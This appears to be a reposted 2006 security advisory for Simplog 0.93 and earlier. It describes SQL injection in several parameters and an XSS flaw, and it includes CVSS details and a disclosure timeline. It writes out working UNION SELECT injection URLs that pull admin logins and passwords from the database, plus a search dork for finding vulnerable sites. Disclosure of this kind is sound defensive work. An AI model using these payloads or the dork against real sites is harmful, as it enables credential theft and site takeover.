Simplog <= 0.93 Multiple Remote Vulnerabilities.

2006.04.22
Credit: Mustafa Can Bjorn IPEKCI (nukedx nukedx com)
Risk: High
Local: No
Remote: Yes
CVE: CVE-2005-3076
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--Security Report-- Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 21/04/06 22:13 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: Simplog (http://www.simplog.org/) Version: 0.93 and prior versions must be affected. About: Via this methods remote attacker can inject arbitrary SQL queries to tid parameter in preview.php, cid,pid and eid in archive.php and pid in comments.php.As u know rgod was published advisory about version 0.92 but he did not notice this SQL injections. He found other SQL injections on archive.php but did not found these vulnerabilities. Also there is cross site scripting vulnerability in imagelist.php's imagedir parameter. Level: Critical --- How&Example: SQL Injection : Needs MySQL > 4.0 GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL] GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL] EXAMPLE -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNIO N/**/SELECT/**/ concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/ **/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SEL ECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* EXAMPLE -> http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SE LECT/**/0,null,0,email,0,0,login, password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* with this examples remote attacker can leak speficied admins login information from database. XSS: GET -> http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login= 1&imagedir=[XSS] --- Timeline: * 21/04/2006: Vulnerability found. * 21/04/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=25 --- Dorks: "powered by simplog" --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=25


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top